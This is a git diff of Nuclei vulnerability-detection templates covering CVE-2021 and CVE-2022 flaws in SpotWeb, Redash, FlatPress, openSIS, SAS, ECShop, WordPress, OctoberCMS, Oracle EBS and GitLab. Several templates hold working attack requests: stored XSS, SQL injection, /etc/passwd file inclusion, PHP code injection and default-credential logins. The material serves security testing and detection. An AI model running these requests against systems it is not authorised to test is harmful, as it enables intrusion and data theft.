cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204852db01ffe89609830cb822e369fbf86f2e398f8e1fd62af14366e76e0fdf6202204144997b38703c3e8f9d6f55c8ba3c51cf9a02be65658c8593e9e9309328e6b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bacabdca74f9c9fbae5381ac0a8ef79f2c5702cb4c709e6194bfeb4213c503e902203c7a3b7376f619852ee754a987330645eee544784fe9acd88459eb72f7029e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40971.yaml b/nuclei-templates/CVE-2021/CVE-2021-40971.yaml index 309a1c194c..88dd6a8150 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40971.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40971.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40971 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.50482 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220365e856059e373dde8aa21cf3985f7b6e3211dcb4cfea108fd08ca6534dc6c9e02200a2a69478ce9b9fc3dbcdc4e778ec8d5d775435806f0440ba6168659e2184563:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220018fbd142442b644347ff23fb7ff5fae090cbd6180d4bae07df55618e3576c9002204f369d1032ff131cbf6c6bd4b8e1394b6b238418b68862884580300adb61e42b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40972.yaml b/nuclei-templates/CVE-2021/CVE-2021-40972.yaml index 76076f284b..3221950a2a 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40972.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40972.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40972 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.50482 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve,cve2021,xss,spotweb,spotweb_project http: - raw: @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bbde7bcb52770ee4d4069ff70f33a1a2ff6a5f0a14f5d3f248cacb564bb163c3022100f2bb138214a73c2225936e8621acff01826d61e8fc4c0f793f687f0e894a417d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202757edffd7b33049b4800f2a103e17130c6a711e551b6c494103f56e468676c2022100f5e21ea7300875d7fc8fddbc5308c309b8637309b4b14ffa1e252ef9e82955e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40973.yaml b/nuclei-templates/CVE-2021/CVE-2021-40973.yaml index 46197a5d83..2ea1e563ed 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40973.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40973.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40973 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.51404 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009ba60028fe4ebcba0787439edb1336e097727d3e6534af36764071e936b66c28022100a8b0b9260dd953a977d69e99448ec07cdcafd475e39be7d1a68c49f700cef914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073aa701bbd4649f3814518c9b0fd5f4dae20221785bc65f0e16eb1352444cd05022066909db2e804aff7795a0f544ba36d182e0a3f49d67735b1434b4a5d05a298e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-41192.yaml b/nuclei-templates/CVE-2021/CVE-2021-41192.yaml index c1d124c9c0..6de3ff1b9c 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41192.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41192.yaml @@ -4,27 +4,39 @@ info: name: Redash Setup Configuration - Default Secrets Disclosure author: bananabr severity: medium - description: "Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value." + description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. + impact: | + An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application. + remediation: | + Remove or update the default secrets in the Redash setup configuration file. reference: - https://hackerone.com/reports/1380121 - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv - https://nvd.nist.gov/vuln/detail/CVE-2021-41192 - metadata: - shodan-query: http.favicon.hash:698624197 - tags: cve,cve2021,redash,auth-bypass + - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2021-41192 cwe-id: CWE-1188 + epss-score: 0.00805 + epss-percentile: 0.79795 + cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: "redash" + product: "redash" + shodan-query: http.favicon.hash:698624197 + tags: cve2021,cve,hackerone,redash,auth-bypass -requests: +http: - method: GET path: - "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" - "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -37,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/23 +# digest: 490a0046304402202db04f9b255e97cf754ebc3deb27b4a54b33ce8bb5d8d77934815ccb21db9ca4022044559ab86eded575e036a3ddd5082711b30d9a6c7f8aa89fa03a1dc0ea16e380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-41349.yaml b/nuclei-templates/CVE-2021/CVE-2021-41349.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41349.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41349.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41432.yaml b/nuclei-templates/CVE-2021/CVE-2021-41432.yaml index 3c8873a4e6..4f48226efe 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41432.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41432.yaml @@ -6,20 +6,33 @@ info: severity: medium description: | FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website. + remediation: | + Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/flatpressblog/flatpress/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2021-41432 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/martinkubecka/CVE-References + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-41432 cwe-id: CWE-79 + epss-score: 0.00067 + epss-percentile: 0.27705 + cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: + verified: true + max-request: 4 + vendor: flatpress + product: flatpress shodan-query: http.html:"Flatpress" - verified: "true" - tags: cve,cve2021,flatpress,xss,authenticated,oss + tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive -requests: +http: - raw: - | POST /login.php HTTP/1.1 @@ -39,40 +52,34 @@ requests: Login ------WebKitFormBoundarykGJmx9vKsePrMkVp-- - - | GET /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} - - | POST /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish - - | GET /index.php/2022/10 HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - - "contains(body_4, '

')" - - "contains(body_4, 'FlatPress')" - - "contains(all_headers_4, 'text/html')" - - "status_code_4 == 200" + - contains(body_4, '

') + - contains(body_4, 'FlatPress') + - contains(header_4, 'text/html') + - status_code_4 == 200 condition: and extractors: - type: regex - internal: true name: nonce - part: body group: 1 regex: - - 'name="_wpnonce" value="([0-9a-z]+)" />' - -# Enhanced by md on 2022/10/17 + - name="_wpnonce" value="([0-9a-z]+)" /> + internal: true + part: body +# digest: 490a00463044022012ed36398f3a3adcb31e49e199e687115b484c759fd6cd62c37427c20c9e9e6402203afca5bfd1f61846e94feb44fc4487b7653f647f3f710f3d444859f1386a7c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-41460.yaml b/nuclei-templates/CVE-2021/CVE-2021-41460.yaml index b787a0c64b..2966c0c9f2 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41460.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41460.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460). reference: @@ -16,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41460 cwe-id: CWE-89 - epss-score: 0.01115 - epss-percentile: 0.82907 + epss-score: 0.00992 + epss-percentile: 0.83223 cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: shopex product: ecshop fofa-query: product="ECShop" - tags: cve,cve2021,cnvd,cnvd2020,ecshop,sqli + tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex variables: num: "999999999" @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220453134e8f86fb2e192f009f5df4c96343f3736d10065d138168e3427cbf6581102207674e80da3a4bfc2503fd9ca99097ec66e58ff97ba406b1105374f8d83557e74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f97a087872b4e92f17b44312e692cfe4d0f8ec4a6f55166f35bcefacfcff9350220181d6e11e86c111ea5092c9e06badfb85abca47cb28463a32d64be15bf46c207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-41569.yaml b/nuclei-templates/CVE-2021/CVE-2021-41569.yaml index 8368ef8fa0..a65c219ae1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41569.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41569.yaml @@ -1,45 +1,28 @@ id: CVE-2021-41569 - info: - name: SAS/Internet 9.4 1520 - Local File Inclusion + name: SAS 9.4 build 1520 - Local File Inclusion author: 0x_Akoko severity: high - description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. - impact: | - Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. - remediation: | - Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application. + description: SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. reference: - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas - - https://support.sas.com/kb/68/641.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41569 - - https://github.com/ARPSyndicate/kenzer-templates + - https://support.sas.com/kb/68/641.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41569 cwe-id: CWE-829 - epss-score: 0.0083 - epss-percentile: 0.81604 - cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sas - product: sas\/intrnet - tags: cve2021,cve,sas,lfi - -http: + tags: cve,cve2021,sas,lfi +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 -# digest: 490a00463044022066c668e47e843611630d49691212fcf0c77d83d76e23ee3b0951b7ec4c12eb2a022018dd9e916134bc6f5153f80143e684c17ed9de2d33bd2a74ba0140f345a91820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-41691.yaml b/nuclei-templates/CVE-2021/CVE-2021-41691.yaml new file mode 100644 index 0000000000..2157dc2b57 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-41691.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-41691 + +info: + name: openSIS Student Information System 8.0 SQL Injection + author: Bartu Utku SARP + severity: high + description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. + remediation: | + Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). + reference: + - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 + - https://www.exploit-db.com/exploits/50637 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 + classification: + cve-id: CVE-2021-41691 + metadata: + max-request: 2 + tags: cve,cve2021,sqli,auth,edb,opensis +variables: + num: "999999999" + +http: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + USERNAME={{username}}&PASSWORD={{password}}&language=en&log= + - | + POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + + attack: pitchfork + payloads: + username: + - student + password: + - student@123 + matchers: + - type: dsl + dsl: + - 'contains(body_2, "' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-21587.yaml b/nuclei-templates/CVE-2022/CVE-2022-21587.yaml index 7336e7b0ac..c5277580ff 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-21587.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-21587.yaml @@ -1,22 +1,34 @@ id: CVE-2022-21587 info: - name: Oracle EBS Unauthenticated - Remote Code Execution + name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: critical description: | - Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. + Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the necessary security patches provided by Oracle to mitigate this vulnerability. reference: - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ - https://www.oracle.com/security-alerts/cpuoct2022.html - https://nvd.nist.gov/vuln/detail/CVE-2022-21587 + - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html + - https://github.com/manas3c/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-21587 - tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth,kev + cwe-id: CWE-306 + epss-score: 0.97315 + epss-percentile: 0.99868 + cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: oracle + product: e-business_suite + tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm -requests: +http: - raw: - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 @@ -42,11 +54,9 @@ requests: ` end ------WebKitFormBoundaryZsMro0UsAQYLDZGv-- - - | GET /OA_CGI/FNDWRR.exe HTTP/1.1 Host: {{Hostname}} - - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 Host: {{Hostname}} @@ -74,3 +84,4 @@ requests: part: body_2 words: - Nuclei-CVE-2022-21587 +# digest: 4b0a00483046022100c45c9f9ebb67164fc04895b7e2d1f11d94d05f52e1d1bc9fcc00b9ca55b61557022100fba0253078fac69a0a71ba3e31f20fef037302f17748f29aa9c24211e8e6aae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-21661.yaml b/nuclei-templates/CVE-2022/CVE-2022-21661.yaml new file mode 100644 index 0000000000..12a501de58 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-21661.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-21661 + +info: + name: WordPress <5.8.3 - SQL Injection + author: Marcio Mendes + severity: high + description: | + WordPress before 5.8.3 is susceptible to SQL injection through multiple plugins or themes due to improper sanitization in WP_Query, An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. + remediation: This has been patched in 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability. + reference: + - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317 + - https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection + - http://packetstormsecurity.com/files/165540/WordPress-Core-5.8.2-SQL-Injection.html + - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84 + - https://nvd.nist.gov/vuln/detail/cve-2022-21661 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21661 + cwe-id: CWE-89 + epss-score: 0.93536 + epss-percentile: 0.99044 + cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wordpress + product: wordpress + tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":[""]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "WordPress database error:")' + - 'contains(body, "error in your SQL syntax")' + condition: and +# digest: 490a004630440220206edf3fca8fce751b9a37bcaf064ab02bbdad20008c646af72985ad45025eea0220501370d4eccd70dec21fa6f52259e317934d99654e5bc503187d2098c479b361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-21705.yaml b/nuclei-templates/CVE-2022/CVE-2022-21705.yaml new file mode 100644 index 0000000000..d48170c9cf --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-21705.yaml @@ -0,0 +1,94 @@ +id: CVE-2022-21705 +info: + name: OctoberCMS Authenticated Remote Code Execution + author: iPhantasmic + severity: high + description: | + Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area. + remediation: | + The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually. + reference: + - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe + - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 + - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-21705 + cwe-id: CWE-74 + tags: cve,cve2022,authenticated,rce,cms,octobercms,injection +requests: + - raw: + - | # to obtain session_key and token + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + - | # to perform authentication and obtain admin cookies + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} + - | # to inject php code in Markup editor and perform exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onSave + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 + - | # to obtain theme + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onCreateTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&type=page + - | # to access the template page for generated exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onOpenTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm + cookie-reuse: true + extractors: + - type: xpath + name: session_key + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" + internal: true + # Obtain _session_key for current OctoberCMS session + - type: xpath + name: token + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" + internal: true + # Obtain _token for current OctoberCMS session + - type: regex + name: theme + part: body + group: 1 + regex: + - 'alert(document.domain)") && contains(body, "microweber")' - 'contains(content_type, "text/html")' condition: and -# digest: 4b0a004830460221009047d27c248643fb1045ba67411cf31063fd934d576385418738258e720457c5022100f6ef858c4389bb8a0ce86b918cda35ecd79469caea73990d96b9d0ac76e908ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b0db83c22e130322437f1502e113df36df14a74f5080f56e6281a41e9c5ea0c0220391b8aae54c023d95b44dc3d6d6e938160b8236a2e5b130fc7a3441f22d711a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2185.yaml b/nuclei-templates/CVE-2022/CVE-2022-2185.yaml index 9b04432fd6..bb52187b77 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2185.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2185.yaml @@ -1,24 +1,36 @@ id: CVE-2022-2185 info: - name: GitLab CE/EE - Import RCE + name: GitLab CE/EE - Remote Code Execution author: GitLab Red Team severity: high - description: A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution. + description: GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches provided by GitLab to mitigate this vulnerability. reference: - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2185 + - https://gitlab.com/gitlab-org/gitlab/-/issues/366088 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-2185 - cwe-id: CWE-732 + cwe-id: CWE-78 + epss-score: 0.5071 + epss-percentile: 0.97469 + cpe: 